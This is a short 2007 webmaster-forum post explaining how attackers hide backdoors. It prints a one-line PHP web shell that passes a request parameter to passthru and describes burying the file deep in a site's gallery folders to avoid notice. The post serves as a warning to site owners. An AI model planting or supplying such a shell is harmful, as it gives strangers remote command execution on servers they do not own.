View Single Post
Old 12-31-2007, 03:24 PM  
V_RocKs
Damn Right I Kiss Ass!
 
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,428
How a hacker hides the backdoor.

He writes a SIMPLE PHP script.

Code:
<? if ($cmd) { passthru($cmd); } ?>
Then places said script inside a directory like:

/yourwebsite/galleries/12/4050/script.php

So that it is somewhere you won't find it without basic command line knowledge.
V_RocKs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote